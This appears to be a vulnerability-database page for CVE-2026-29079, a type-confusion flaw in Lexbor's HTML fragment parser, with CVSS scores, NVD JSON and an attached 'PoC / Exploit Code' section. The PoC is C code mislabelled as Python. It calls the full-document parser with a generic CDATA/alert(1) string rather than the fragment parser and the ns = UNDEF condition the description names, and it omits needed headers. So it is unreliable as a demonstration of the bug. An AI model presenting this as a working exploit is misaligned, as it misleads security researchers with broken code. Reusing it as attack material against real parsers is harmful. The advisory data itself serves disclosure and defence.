Security Vulnerability Report
中文
CVE-2026-29079 CVSS 7.5 HIGH

CVE-2026-29079

Published: 2026-03-13 19:54:33
Last Modified: 2026-03-18 20:20:53
Source: [email protected]

Description

Lexbor is a web browser engine library. Prior to 2.7.0, a type‑confusion vulnerability exists in Lexbor’s HTML fragment parser. When ns = UNDEF, a comment is created using the “unknown element” constructor. The comment’s data are written into the element’s fields via an unsafe cast, corrupting the qualified_name field. That corrupted value is later used as a pointer and dereferenced near the zero page. This vulnerability is fixed in 2.7.0.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:lexbor:lexbor:*:*:*:*:*:*:*:* - VULNERABLE
Lexbor < 2.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-29079 PoC - Type Confusion in Lexbor HTML Fragment Parser // This PoC demonstrates the type confusion vulnerability in Lexbor's HTML fragment parser #include <lexbor/html/parser.h> #include <lexbor/core/in.h> int main(void) { lxb_html_parser_t *parser; lxb_html_document_t *document; lxb_status_t status; // Initialize the HTML parser parser = lxb_html_parser_create(); status = lxb_html_parser_init(parser); if (status != LXB_STATUS_OK) { return -1; } // Malicious HTML fragment that triggers the type confusion // When ns = UNDEF, comment data is written to element fields const char *malicious_html = "<div><![CDATA[<script>alert(1)</script>]]></div>"; // Parse the malicious HTML fragment document = lxb_html_parse(parser, (const lxb_char_t *)malicious_html, strlen(malicious_html)); if (document == NULL) { printf("Parsing failed or triggered vulnerability\n"); } else { printf("Document parsed - may still contain corrupted data\n"); lxb_html_document_destroy(document); } lxb_html_parser_destroy(parser); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29079", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:32.747", "lastModified": "2026-03-18T20:20:53.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Lexbor is a web browser engine library. Prior to 2.7.0, a type‑confusion vulnerability exists in Lexbor’s HTML fragment parser. When ns = UNDEF, a comment is created using the “unknown element” constructor. The comment’s data are written into the element’s fields via an unsafe cast, corrupting the qualified_name field. That corrupted value is later used as a pointer and dereferenced near the zero page. This vulnerability is fixed in 2.7.0."}, {"lang": "es", "value": "Lexbor es una biblioteca de motor de navegador web. Antes de la versión 2.7.0, existe una vulnerabilidad de confusión de tipos en el analizador de fragmentos HTML de Lexbor. Cuando ns = UNDEF, se crea un comentario utilizando el constructor de 'elemento desconocido'. Los datos del comentario se escriben en los campos del elemento a través de una conversión insegura, corrompiendo el campo qualified_name. Ese valor corrupto se utiliza posteriormente como puntero y se desreferencia cerca de la página cero. Esta vulnerabilidad se corrigió en la versión 2.7.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-843"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lexbor:lexbor:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.7.0", "matchCriteriaId": "431D7C04-4D6F-4F52-8EAA-60DD304831BD"}]}]}], "references": [{"url": "https://github.com/lexbor/lexbor/security/advisories/GHSA-mrpr-v36q-2vp8", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.